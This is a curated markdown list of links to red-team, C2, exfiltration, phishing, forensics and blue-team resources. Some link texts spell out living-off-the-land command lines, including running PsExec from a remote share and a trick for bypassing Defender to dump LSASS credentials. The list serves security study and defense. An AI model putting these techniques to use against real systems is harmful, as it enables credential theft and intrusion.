- [The worst of the two worlds: Excel meets Outlook](https://adepts.of0x.cc/vba-outlook/)
- [redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness](https://github.com/redcanaryco/AtomicTestHarnesses)
- [pivoting cheat sheet](https://twitter.com/ptswarm/status/1369310272213684237?s=21)
- [Self-hosting Your Red Team Payloads](https://breakdev.org/pwndrop/): [pwndrop](https://github.com/kgretzky/pwndrop): Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.
- [Boomerang](https://github.com/paranoidninja/Boomerang) is a tool to expose multiple internal servers to web/cloud. Agent & Server are pretty stable and can be used in Red Team for Multiple levels of Pivoting and exposing multiple internal services to external/other networks.
- [Mythic](https://github.com/its-a-feature/Mythic): A collaborative, multi-platform, red teaming framework.
- [Alan Framework](https://github.com/enkomio/AlanFramework): A post-exploitation framework.
- [Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams](https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/)
- [Red Teaming/Adversary Simulation Toolkit](https://0x1.gitlab.io/pentesting/Red-Teaming-Toolkit/)
- [Wiki to collect Red Team infrastructure hardening resources](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki).
- [Red Team development and operations](https://redteam.guide/): A PRACTICAL GUIDE TO RED TEAM OPERATIONS, WRITTEN BY: JOE VEST AND JAMES TUBBERVILLE
- [VECTR](https://github.com/SecurityRiskAdvisors/VECTR) is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios.
- [Mortar Loader](https://github.com/0xsp-SRD/mortar): evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR).
- [RedTeam-Tools](https://github.com/A-poc/RedTeam-Tools): Tools and Techniques for Red Team / Penetration Testing.

#### Command & Control (C2)

- [Cobalt Strike](https://www.cobaltstrike.com/): is software for Adversary Simulations and Red Team Operations. 4.2 [release notes](https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/)
- [CrossC2](https://github.com/gloxec/CrossC2): generate CobaltStrike's cross-platform payload
- [Cobalt-Strike-CheatSheet](https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet): Some notes and examples for cobalt strike's functionality
- [Introducing](https://blog.cobaltstrike.com/2021/08/06/introducing-cobalt-strike-community-kit/) [community kit](https://cobalt-strike.github.io/community_kit/)
- [Octopus](https://github.com/mhaskar/Octopus): Open source pre-operation C2 server based on python and powershell [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/)
- [Covenant](https://github.com/cobbr/Covenant): Covenant is a collaborative .NET C2 framework for red teamers.
- [Building C2 Implants in C++: A Primer](https://shogunlab.gitbook.io/building-c2-implants-in-cpp-a-primer/)
- [tc2](https://github.com/leonjza/tc2): treafik fronted c2 examples
- [ToRat](https://github.com/lu4p/ToRat): is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication.
- [Python Backdoor Talking to a C2 Through Ngrok](https://isc.sans.edu/forums/diary/Python+Backdoor+Talking+to+a+C2+Through+Ngrok/26866/)
- [Silver](https://github.com/BishopFox/sliver): Implant framework
- [Cobalt Strike Beacon Injected into werfault.exe](https://twitter.com/acalarch/status/1364618494348840961)
=======
- [PoshC2](https://github.com/nettitude/PoshC2): is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. [Native macOS Implants](https://labs.nettitude.com/blog/poshc2-introducing-native-macos-implants/)
- [pyMalleableC2](https://github.com/Porchetta-Industries/pyMalleableC2): Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically.
- [link](https://github.com/postrequest/link): is a command and control framework written in rust.
- [Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1](https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/)
- [THIRD STEP IN SETTING UP C2 ENVIRONMENT. USING SOCAT AS FRONT TO MERLIN. COMMAND AND CONTROL MY WAY.](https://blogg.invid.eu/2021/12/03/third-step-in-setting-up-c2-environment-using-socat-as-front-to-merlin-command-and-control-my-way-c2_matrix-merlin_c2-pentest-pentesting-redteam-infosec/)
- [Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2](https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2)
- [melting-cobalt](https://github.com/splunk/melting-cobalt): A Cobalt Strike Scanner that retrieves detected Team Server beacons into a JSON object.
- [面向iOS攻击的beacon生成](https://gloxec.github.io/CrossC2/zh_cn/usage/iOS.html): command & control on iOS

### Purple Team

- [Purple Cloud](https://github.com/iknowjason/PurpleCloud): An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On [kiploit](https://www.kitploit.com/2020/09/purplecloud-infrastructure-as-code-iac.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+PentestTools+%28PenTest+Tools%29)
- [PRO TIP when looking through logs on Windows. Use WEVTUTIL.exe](https://twitter.com/jorgeorchilles/status/1358203486614224898)

## DNS

- [dnstwist](https://github.com/elceef/dnstwist)
- [Plight At The End Of The Tunnel](https://www.endgame.com/blog/technical-blog/plight-end-tunnel)
- [dref](https://github.com/mwrlabs/dref): DNS Rebinding Exploitation Framework
- [dns-rebind-toolkit](https://github.com/brannondorsey/dns-rebind-toolkit): A front-end JavaScript toolkit for creating DNS rebinding attacks.
- [Bypass firewalls by abusing DNS history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history): Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
- [dnstwist](https://github.com/elceef/dnstwist): Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
- [Can I take over XYZ?](https://github.com/EdOverflow/can-i-take-over-xyz): a list of services and how to claim (sub)domains with dangling DNS records.
- [SubR3con](https://github.com/rohitcoder/SubR3con): is a script written in python. It uses Sublist3r to enumerate all subdomains of specific target and then it checks for stauts code for possible subdomain takeover vulnerability. This works great with Subover.go
- [TakeOver-v1](https://github.com/samhaxr/TakeOver-v1): script extracts CNAME record of all subdomains at once. TakeOver saves researcher time and increase the chance of finding subdomain takeover vulnerability.
- [subzy](https://github.com/LukaSikic/subzy): Subdomain takeover vulnerability checker.
- [Subdomain Takeover Scanner](https://github.com/SaadAhmedx/Subdomain-Takeover)
- [subdomain-takeover](https://github.com/antichown/subdomain-takeover): SubDomain TakeOver Scanner by 0x94.
- [DNSCrypt](https://dnscrypt.info/) is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with. [dnscrypt-proxy 2](https://github.com/DNSCrypt/dnscrypt-proxy), [resolvers](https://github.com/DNSCrypt/dnscrypt-resolvers) and [docker image](https://github.com/DNSCrypt/dnscrypt-server-docker).
- [pdns-qof](https://github.com/adulau/pdns-qof): Passive DNS Common Output Format.
- [dnsdbq](https://github.com/dnsdb/dnsdbq): DNSDB API Client, C Version.
- DNS Logging:
- [How to enable bind query logging to find out Who’s Querying a Name Server](https://www.thegeekdiary.com/how-to-enable-bind-query-logging-to-find-out-whos-querying-a-name-server/)
- [BIND Logging - some basic recommendations](https://kb.isc.org/docs/aa-01526)
- [BIND 9 logging best practices](https://www.slideshare.net/MenandMice/bind-9-logging-best-practices)
- [BIND9 Configuration Guide](https://www.malwarepatrol.net/bind9-configuration-guide/)
- [Thwarting and detecting malware with RPZ and OSSEC](https://www.redpill-linpro.com/sysadvent/2015/12/15/rpz-malware-detection.html)
- [The Importance of DNS Logging in Enterprise Security](https://nxlog.co/whitepapers/dns-logging)
- [DNSObserver](https://github.com/allyomalley/dnsobserver): A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications via Slack. [Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor](https://www.allysonomalley.com/2020/05/22/dnsobserver/)
- [Unbound DNS Blacklist](https://vermaden.wordpress.com/2020/11/18/unbound-dns-blacklist/)
- [subjack](https://github.com/haccer/subjack): Subdomain Takeover tool written in Go
- [sad dns](https://www.saddns.net/): The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
- [dog](https://github.com/ogham/dog): Command-line DNS client
- [NtHiM](https://github.com/TheBinitGhimire/NtHiM): Now, the Host is Mine! - Super Fast Sub-domain Takeover Detection!
- [Passive DNS - Common Output Format](https://github.com/adulau/pdns-qof/) [improving internet wide scanning with dynamic scanning](https://github.com/adulau/active-scanning-techniques/blob/main/slides/active-scanning.pdf)
- [DNS loophole makes nation-state level spying as easy as registering a domain](https://www.wiz.io/blog/black-hat-2021-dns-loophole-makes-nation-state-level-spying-as-easy-as-registering-a-domain) [Dynamic DNS Leakage Tester](https://dynamic-dns-checker.tools.wiz.io/)

## Exfiltration

- [Script for searching the extracted firmware file system for goodies!](https://github.com/craigz28/firmwalker)
- [DKMC - Dont kill my cat](https://github.com/Mr-Un1k0d3r/DKMC): Malicious payload evasion tool
- [Tunna](https://github.com/SECFORCE/Tunna) is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
- [gitleaks](https://github.com/zricethezav/gitleaks): Searches full repo history for secrets and keys
- [Twitter Scraper](https://github.com/kennethreitz/twitter-scraper)
- [tinfoleak](https://www.vicenteaguileradiaz.com/tools/) ([github](https://github.com/vaguileradiaz/tinfoleak)):The most complete open-source tool for Twitter intelligence analysis
- [Social IDs](https://github.com/guillermo-carrasco/social_ids): Get user ids from social network handlers
- [SpookFlare](https://github.com/hlldz/SpookFlare): Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures.
- [Photon](https://github.com/s0md3v/Photon): Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
- [Extracting data from an EMV (Chip-And-Pin) Card with NFC technology](https://insinuator.net/2018/02/extracting-data-from-an-emv-chip-and-pin-card-with-nfc-technology/)
- [accountanalysis](http://accountanalysis.app/): This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often.
- [How to get authentication key from SNMPv3 packets](https://www.florianchemin.com/blog/how-to-get-authentication-key-from-snmpv3-packets/)
- [AtomicTestsCommandLines.txt](https://gist.github.com/caseysmithrc/d48e43770ab4ee161b1a806da8ccf390): Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
- [whois | GTFOBins](https://gtfobins.github.io/gtfobins/whois/): hangs waiting for the remote peer to close the socket. [github](https://github.com/GTFOBins/GTFOBins.github.io), GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
- [ssh-keygen can be used to load shared libraries](https://twitter.com/PizazzJazz/status/1462434711205203976/photo/1)
- [Browsers affected by the History API DoS](https://docs.google.com/spreadsheets/d/1TqMgokKqAT8WxNed0iV0X0mXvJ28Eqd9xBJcQ7uYaCY/htmlview)
- [PacketWhisper](https://www.kitploit.com/2018/09/packetwhisper-stealthily-exfiltrate.html): Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography. [PacketWhisper](https://github.com/TryCatchHCF/PacketWhisper): Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server.
- [Using Google Analytics for data extraction](https://labs.detectify.com/2018/01/19/google-analytics-data-extraction/)
- [Exfiltrating credentials via PAM backdoors & DNS requests](https://x-c3ll.github.io/posts/PAM-backdoor-DNS/)
- [Building simple DNS endpoints for exfiltration or C&C](https://x-c3ll.github.io/posts/DNS-endpoint-exfiltration/)
- [CheckPlease](https://github.com/Arvanaghi/CheckPlease): Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust.
- [okhttp-peer-certificate-extractor](https://github.com/fabiomsr/okhttp-peer-certificate-extractor): This tool extracts peer certificates from given certificates.
- [DET](https://github.com/sensepost/DET): (extensible) Data Exfiltration Toolkit (DET)
- [awesome-python-login-model](https://github.com/CriseLYJ/awesome-python-login-model): login access for webscrapping.
- [Hamburglar](https://github.com/needmorecowbell/Hamburglar): collect useful information from urls, directories, and files.
- [Giggity](https://github.com/needmorecowbell/giggity): grab hierarchical data about a github organization, user, or repo.
- [Living Off The Land Binaries and Scripts (and also Libraries)](https://lolbas-project.github.io/#) - [github](https://github.com/LOLBAS-Project/LOLBAS)
- [Windows TCPIP Finger Command](http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt): C2 Channel and Bypassing Security Software
- [Living Off Windows Land – A New Native File “downldr”](https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/)
- [Ttdinject.exe](https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/): Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
- [Exfiltrate Like a Pro](https://iwantmore.pizza/posts/dnscat2-over-doh.html): Using DNS over HTTPS as a C2 Channel
- [Awesome Asset Discovery](https://github.com/redhuntlabs/Awesome-Asset-Discovery): List of Awesome Asset Discovery Resources
- [Cloakify-Factory:](https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-steganography/): A Data Exfiltration Tool Uses Text-Based Steganography. [Cloakify](https://github.com/TryCatchHCF/Cloakify): Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.
- [hakrawler](https://github.com/hakluke/hakrawler): Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application. [A Fast Web Crawler for Hackers](https://medium.com/@hakluke/introducing-hakrawler-a-fast-web-crawler-for-hackers-ff799955f134)
- [Chameleon](https://github.com/mdsecactivebreach/Chameleon): A tool for evading Proxy categorisation.
- [DNSExfiltrator](https://github.com/Arno0x/DNSExfiltrator): Data exfiltration over DNS request covert channel
- [Data Exfiltration using Linux Binaries](https://www.hackingarticles.in/data-exfiltration-using-linux-binaries/)
- [Exploring the WDAC Microsoft Recommended Block Rules: kill.exe](https://twitter.com/bohops/status/1324563760967753730/photo/3). lolbin/lolbas
- MSOXMLED.EXE - [Desperate downloader](https://www.hexacorn.com/blog/2021/02/05/desperate-downloader-lolbin/)
- LOLBIN/LOLBAS:
- [Exploring the WDAC Microsoft Recommended Block Rules: kill.exe](https://twitter.com/bohops/status/1324563760967753730/photo/3). lolbin/lolbas
- [I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source=](https://twitter.com/notwhickey/status/1333900137232523264) lolbin/lolbas
- [C:\Windows\System32\Cmdl32.exe](https://twitter.com/ElliotKillick/status/1455897435063074824)
- [I shot the sigverif.exe – the GUI-based LOLBin](https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/) [Sigverif.exe](https://twitter.com/0gtweet/status/1457676633809330184?s=28)
- [\\http://live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe](https://twitter.com/cyb3rops/status/1448208520680284164?s=28)
- [Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus?](https://twitter.com/0gtweet/status/1450104328044400642?s=28)
- [C:\Windows\System32\WorkFolders.exe](https://twitter.com/ElliotKillick/status/1449812843772227588?s=20)
- [C:\Windows\System32\certoc.exe -LoadDLL ](https://twitter.com/sblmsrsn/status/1445758411803480072?s=20)
- [if you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.](https://twitter.com/mrd0x/status/1460597833917251595)
- [Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service](https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html) [BitsParser](https://github.com/fireeye/BitsParser)
- [Living off the land](https://posts.slayerlabs.com/living-off-the-land/)
- [It's not a forgotten legacy code, it's recidivism](https://twitter.com/0gtweet/status/1386598361919332353): tpmtool drivetracing.

### Steganography

- [A list of useful tools and resources](https://0xrick.github.io/lists/stego/).
- [steghide](https://github.com/StefanoDeVuono/steghide): is a steganography program that is able to hide data in various kinds of image- and audio-files.
- [stegsolve](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve).
- [Unicode Text Steganography Encoders/Decoders](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)
- [StegCracker](https://github.com/Paradoxis/StegCracker): Steganography brute-force utility to uncover hidden data inside files.
- [Simple Image Steganography in Python](https://hackernoon.com/simple-image-steganography-in-python-18c7b534854f)
- [How To Hide Data in Images Using Python](https://betterprogramming.pub/image-steganography-using-python-2250896e48b9)
- [Aperi'Solve](https://aperisolve.fr/) is an online platform which performs layer analysis on image. The platform also uses zsteg, steghide, outguess, exiftool, binwalk, foremost and strings for deeper steganography analysis.
- [Stegseek](https://github.com/RickdeJager/stegseek): Worlds fastest steghide cracker, chewing through millions of passwords per second

## Phishing

- [Phishing on Twitter](https://github.com/omergunal/PoT)
- [evilginx2](https://github.com/kgretzky/evilginx2): Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
- [shellphish](https://github.com/thelinuxchoice/shellphish): Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
- [pompa](https://github.com/m1nl/pompa): Fully-featured spear-phishing toolkit - web front-end.
- [..Modlishka..](https://github.com/drk1wi/Modlishka): Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side).
- [Using phishing tools against the phishers](https://medium.com/mycrypto/using-phishing-tools-against-the-phishers-and-uncovering-a-massive-binance-phishing-campaign-58132e2f0e09) — and uncovering a massive Binance phishing campaign.
- [Lure](https://github.com/highmeh/lure): User Recon Automation for GoPhish
- [PhishingKitTracker](https://github.com/marcoramilli/PhishingKitTracker): An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats.
- [SimplyTemplate](https://github.com/SimplySecurity/SimplyTemplate): Phishing Template Generation Made Easy.
- [Compromising operating systems through fake software updates](https://medium.com/purple-team/compromising-operating-systems-through-fake-software-updates-3cc4b40a0936). Using: [evilgrade](https://github.com/infobyte/evilgrade) is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.
- [MurmurHash](https://github.com/Viralmaniar/MurMurHash): This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.
- [SniperPhish](https://github.com/GemGeorge/SniperPhish): The Web-Email Spear Phishing Toolkit
- [King Phisher](https://github.com/rsmusllp/king-phisher): Phishing Campaign Toolkit
- [phishing-frenzy](https://github.com/pentestgeek/phishing-frenzy): Ruby on Rails Phishing Framework.
- [gophish](https://github.com/gophish/gophish): [Open-Source Phishing Toolkit](https://getgophish.com/)
- [Phishing 101: why depend on one suspicious message subject when you can use many?](https://isc.sans.edu/forums/diary/Phishing+101+why+depend+on+one+suspicious+message+subject+when+you+can+use+many/27842/)
- [Widespread credential phishing campaign abuses open redirector links](https://www.microsoft.com/security/blog/2021/08/26/widespread-credential-phishing-campaign-abuses-open-redirector-links/)
- [ThePhish](https://github.com/emalderson/ThePhish): an automated phishing email analysis tool

## Forensics

- [Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!](https://blog.pnb.io/2018/02/bruteforcing-linux-full-disk-encryption.html)
- [O-Saft](https://github.com/OWASP/O-Saft): OWASP SSL advanced forensic tool
- [PcapXray](https://github.com/Srinivas11789/PcapXray) - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
- [swap_digger](https://github.com/sevagas/swap_digger) is a tool used to automate Linux swap analysis during post-exploitation or forensics
- [The Sleuth Kit® (TSK)](https://github.com/sleuthkit/sleuthkit) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
- [Invoke-LiveResponse](https://github.com/mgreen27/Powershell-IR)
- [Linux Forensics](https://www.pentesteracademy.com/course?id=20)
- [CDQR](https://github.com/orlikoski/CDQR): The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
- [mac_apt](https://github.com/ydkhatri/mac_apt/): macOS Artifact Parsing Tool
- [MacForensics](https://github.com/ydkhatri/MacForensics): Repository of scripts for processing various artifacts from macOS (formerly OSX).
- [imago-forensics](https://github.com/redaelli/imago-forensics): Imago is a python tool that extract digital evidences from images.
- [remedi-infrastructure](https://github.com/NationalCrimeAgency/remedi-infrastructure): setup and deployment code for setting up a REMEDI machine translation cluster
- [Tsurugi Linux](https://tsurugi-linux.org/index.php) is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
- [libelfmaster](https://github.com/elfmaster/libelfmaster): Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
- [usbrip](https://github.com/snovvcrash/usbrip) (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
- [Digital Forensics and Incident Response](https://www.jaiminton.com/cheatsheet/DFIR/): This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response.
- [KAPE](https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape) - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. [blog post](https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape). [KAPE docs](https://ericzimmerman.github.io/KapeDocs/) and [KAPE Files](https://github.com/EricZimmerman/KapeFiles)
- [AVML](https://github.com/microsoft/avml)(Acquire Volatile Memory for Linux).
- [turbinia](https://github.com/google/turbinia): Automation and Scaling of Digital Forensics Tools
- [Eric Zimmerman's Tools](https://ericzimmerman.github.io/)
- [MacQuisition](https://www.blackbagtech.com/products/macquisition/): A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
- [Kuiper](https://github.com/DFIRKuiper/Kuiper): Digital Forensics Investigation Platform
- [file Signatures](https://www.filesignatures.net/):
- [PowerForensics](https://github.com/Invoke-IR/PowerForensics): PowerForensics provides an all in one platform for live disk forensic analysis. [Powershell](https://www.powershellgallery.com/packages/PowerForensics/1.1.1)
- [OfficeForensicTools](https://github.com/DissectMalware/OfficeForensicTools): A set of tools for collecting forensic information.
- [FBI Electronic Tip For](https://tips.fbi.gov)
- [CHIRP](https://github.com/cisagov/CHIRP): A forensic collection tool written in Python.
- [Hash Cracking with AWS and hashcat](https://terasq.com/2021/03/hash-cracking-with-aws-and-hashcat/)
- [Hashcat new feature: autodetect hash-mode](https://asciinema.org/a/418653)
- [L0phtCrack](https://l0phtcrack.gitlab.io/) is a password auditing and recovery application originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, hybrid attacks, and rainbow tables. [gitlab repo](https://gitlab.com/l0phtcrack/l0phtcrack)
- [Foremost](https://github.com/korczis/foremost): is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you
- [TrID](https://mark0.net/soft-trid-e.html): is an utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way.
- [image-unshredding](https://github.com/robinhouston/image-unshredding): Image unshredding using a TSP solver.
- [Linux Incident Response Guide](https://www.halkynconsulting.co.uk/a/2020/11/linux-incident-response-guide/)
- [FastIR Artifacts](https://github.com/SekoiaLab/fastir_artifacts): Live forensic artifacts collector.
- [MVT](https://github.com/mvt-project/mvt) (Mobile Verification Toolkit) helps conducting forensics of mobile devices in order to find signs of a potential compromise.
- [Cloud Forensics Triage Framework (CFTF)](https://www.sans.org/white-papers/40415/)
- [Forensic Investigation](https://cisco.bravais.com/s/kCvJYJKyhuyQqAZSU6Xk) Cisco Stealthwatch at work
- [Andriller CE (Community Edition)](https://github.com/den4uk/andriller): is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices.
- [Dshell](https://github.com/USArmyResearchLab/Dshell) is a network forensic analysis framework.
- [exif-gps-tracer](https://github.com/AidenPearce369/exif-gps-tracer): A python script which allows you to parse GeoLocation data from your Image files stored in a dataset.It also produces output in CSV file and also in HTML Google Maps.
- Anti-Forensics:
- [ShredOS x86_64 - Disk Eraser](https://github.com/PartialVolume/shredos.x86_64): for all Intel 64 bit processors as well as processors from AMD and other vendors which make compatible 64 bit chips. ShredOS - Secure disk erasure/wipe.
- [dfir_ntfs](https://github.com/msuhanov/dfir_ntfs): An NTFS/FAT parser for digital forensics & incident response.
- [MemProcFS](https://github.com/ufrisk/MemProcFS): is an easy and convenient way of viewing physical memory as files in a virtual file system.
- [LeechCore](https://github.com/ufrisk/LeechCore): Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent.
- [PCILeech](https://github.com/ufrisk/pcileech): Direct Memory Access (DMA) Attack Software.

### PDF

- [PDF Tools](https://blog.didierstevens.com/programs/pdf-tools/)
- [peepdf](https://github.com/jesparza/peepdf): Powerful Python tool to analyze PDF documents.
- [How to Protect Files With Canary Tokens](https://resources.infosecinstitute.com/topic/how-to-protect-files-with-canary-tokens/)
- [Attacks on PDF Certification](https://www.pdf-insecurity.org/)
- PDF files
- [How to remove malicious code from PDF files](https://www.ernstrenner.com/how-to-remove-malicious-code-from-pdf-files/)
- [mu tools](https://www.systutorials.com/docs/linux/man/1-mutool/)
- [PDF forensics with Kali Linux : pdfid and pdfparser](https://www.hackercoolmagazine.com/pdf-forensics-kali-linux-pdfid-pdfparser/)
- [How can I extract a JavaScript from a PDF file with a command line tool?](https://stackoverflow.com/questions/29342542/how-can-i-extract-a-javascript-from-a-pdf-file-with-a-command-line-tool)
- [Insecure Features in PDFs.](https://twitter.com/CheariX/status/1351090293752389634) [gs strings bug](https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde) [article](https://web-in-security.blogspot.com/2021/01/insecure-features-in-pdfs.html)
- [Shadow Attacks … the smallest attack vector ever](https://web-in-security.blogspot.com/2021/10/shadow-attacks-smallest-attack-vector.html)

### Email Headers

- [Configuring MTA-STS and TLS Reporting For Your Domain](https://isc.sans.edu/forums/diary/Configuring+MTASTS+and+TLS+Reporting+For+Your+Domain/24840/)
- [Google Admin Toolbox](https://toolbox.googleapps.com/apps/messageheader/analyzeheader)
- [Azure Message Header Analyzer](https://mha.azurewebsites.net/)

### Distros

- [CAINE](https://www.caine-live.net/): Computer Aided INvestigative Environment. Is an Italian GNU/Linux live distribution created as a Digital Forensics project.
- [e-Fense Helix 3](https://www.e-fense.com/store/index.php?_a=viewProd&productId=11)
- [black arch](https://blackarch.org/): An ArchLinux based distribution for penetration testers and security researchers.
- [List of Live Distributions for Computer Forensics](https://resources.infosecinstitute.com/category/computerforensics/introduction/free-open-source-tools/overview-of-computer-forensics-linux-distributions/)

### Volatility

- [volatility](https://github.com/volatilityfoundation/volatility): An advanced memory forensics framework
- [Volatility profiles for Linux and Mac OS X](https://github.com/volatilityfoundation/profiles)
- [Building a profile for Volatility](https://cyberfibers.com/2014/05/volatility-profiles/)
- [OROCHI](https://github.com/LDO-CERT/orochi): The Volatility Collaborative GUI
- [AutoVolatility](https://github.com/carlospolop/autoVolatility): Run several volatility plugins at the same time.
- [Memory Forensics and Analysis Using Volatility](https://resources.infosecinstitute.com/memory-forensics-and-analysis-using-volatility/)
- [Volatility, my own cheatsheet (Part 1): Image Identification](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/)
- [First steps to volatile memory analysis](https://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1)
- [MemLabs](https://github.com/stuxnet999/MemLabs): Educational, CTF-styled labs for individuals interested in Memory Forensics.

## Blue Team

- MITRE ATT&CK:
- [ATTACK-Tools](https://github.com/nshalabi/ATTACK-Tools): Utilities for MITRE™ ATT&CK
- (pt-br)[Analisando ameaças com Mitre ATT&CK Navigator](https://medium.com/blueops/mitre-navigator-9aa9d1aeb570)
- [ATT&CK™ Navigator](https://mitre.github.io/attack-navigator/enterprise/): Web app that provides basic navigation and annotation of ATT&CK matrices [github](https://github.com/mitre/attack-navigator).
- [Atomic Threat Coverage](https://github.com/atc-project/atomic-threat-coverage): Actionable analytics designed to combat threats based on MITRE's ATT&CK.
- [atomic-red-team](https://github.com/redcanaryco/atomic-red-team): Small and highly portable detection tests based on MITRE's ATT&CK.
- [Welcome to Stealthbits Attack Catalog](https://attack.stealthbits.com/): Adversary techniques for credential theft and data compromise.
- [Splunk Attack Range](https://github.com/splunk/attack_range): A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk.
- [attack-scripts](https://github.com/mitre-attack/attack-scripts/): Scripts and a (future) library to improve users' interactions with the ATT&CK content.
